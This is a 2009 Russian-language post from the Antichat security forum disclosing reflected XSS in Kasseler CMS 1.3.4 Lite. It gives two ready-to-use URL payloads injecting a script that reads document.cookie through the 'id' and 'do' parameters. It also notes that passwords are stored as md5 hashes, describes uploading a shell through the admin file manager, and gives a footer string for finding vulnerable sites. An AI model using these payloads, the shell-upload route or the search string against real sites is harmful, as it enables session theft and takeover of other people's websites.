ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Немного XSS в Kasseler CMS 1.3.4 Lite
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Немного XSS в Kasseler CMS 1.3.4 Lite
  #1  
Старый 27.01.2009, 11:14
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию Немного XSS в Kasseler CMS 1.3.4 Lite
Kasseler CMS 1.3.4 Lite возможно и ранние версии
http://www.kasseler-cms.net/


Пасивные XSS:

1.http://*****.ru/index.php?module=News&do=View&id=<script>alert(doc ument.cookie)</script>
или
2.http://*****.ru/index.php?module=News&do=<script>alert(document.co okie)</script>&id=1

Вообще вместо этих ссылок можно использовать любую... Уязвимые параметры ID и DO именно в них и прокатывает пасивка

hash - md5

Заливка шела:
Переходим в админку -> Файловый менеджер -> Выбираем нужный нам каталог -> и внизу можно залить файлы в него

Как искать:
by Kasseler CMS. All rights reserved.

Если что то не так прошу меня поправить... =) Все таки первое что нашел сам =)
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ